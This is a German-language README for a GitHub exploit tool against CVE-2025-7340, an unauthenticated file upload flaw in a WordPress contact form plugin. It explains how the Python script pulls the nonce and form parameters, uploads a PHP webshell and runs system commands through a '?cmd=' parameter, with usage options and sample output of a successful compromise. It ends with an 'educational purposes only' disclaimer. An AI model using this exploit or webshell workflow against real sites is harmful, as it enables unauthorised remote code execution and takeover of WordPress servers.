
HT Contact Form Widget für Elementor Page Builder und Gutenberg Blocks und Form Builder. <= 2.2.1 - Nicht authentifizierter willkürlicher Dateiupload
CVE: CVE-2025-7340
CVSS: 9.8 (Kritisch)
Das HT Contact Form Widget For Elementor Page Builder & Gutenberg Blocks & Form Builder.-Plugin für WordPress ist anfällig für willkürliche Datei-Uploads aufgrund fehlender Dateityp-Validierung in der temp_file_upload-Funktion in allen Versionen bis einschließlich 2.2.1.
Dies ermöglicht nicht authentifizierten Angreifern, willkürliche Dateien auf den Server hochzuladen, was potenziell zu Remote Code Execution (RCE) führen kann.
Dieses Repository enthält ein Python-Exploit-Skript, das die Erkennung des anfälligen Formulars automatisiert und eine Webshell auf die betroffene Seite hochlädt.
Das Skript erkennt intelligent die erforderlichen Parameter (nonce, form_id, ajax endpoint) und lädt eine PHP-Shell in den angreifbaren Pfad hoch.
✅ Beispiel für eine anfällige Formular-URL:
http://target.com/contact/
✅ Das anfällige Formular muss sich auf der Seite befinden, die Sie mit der Option -u übergeben.
Vor dem Ausführen des Skripts installieren Sie die erforderlichen Python-Module:
pip install -r requirements.txt
Inhalt von requirements.txt:
requests
colorama
usage: CVE-2025-7340.py [-h]
Exploit for CVE-2025-7340 - Unauthenticated Arbitrary File Upload | by Khaled Alenazi (Nxploited)
options:
-h, --help show this help message and exit
-u, --url URL Target URL e.g http(s)://target.com
| Option | Beschreibung |
|---|---|
-h, --help | Zeigt diese Hilfemeldung an und beendet das Programm |
-u, --url URL | Ziel-URL, z.B. http(s)://target.com/contact |
Sobald der Exploit erfolgreich abgeschlossen ist, können Sie auf Ihre hochgeladene Shell unter dem angegebenen Pfad zugreifen.
Fügen Sie ?cmd=<your_command> hinzu, um Systembefehle auszuführen.
✅ Beispiel:
http://target.com/wp-content/uploads/ht_form/temp/shell.php?cmd=whoami
Starting exploit against target...
Fetching target page...
Extracting parameters...
Extracted Nonce: 346c441903
AJAX Endpoint: http://nxploit.ddev.site/wp-admin/admin-ajax.php
Form ID: 86
Generating webshell...
Uploading shell, please wait...
[+] Exploit Successfully!
Go to: wp-content/uploads/ht_form/temp/687590d90ac1c-shell.php
Exploit by: Khaled Alenazi (Nxploited) - GitHub: https://github.com/Nxploited
Dieses Tool wird ausschließlich zu Bildungs- und Forschungszwecken bereitgestellt.
Der Autor ist nicht verantwortlich für Schäden oder Missbrauch dieses Codes.
Holen Sie stets eine ausdrückliche Genehmigung ein, bevor Sie Tests an einem System durchführen.
Khaled Alenazi (Nxploited)
GitHub: Nxploited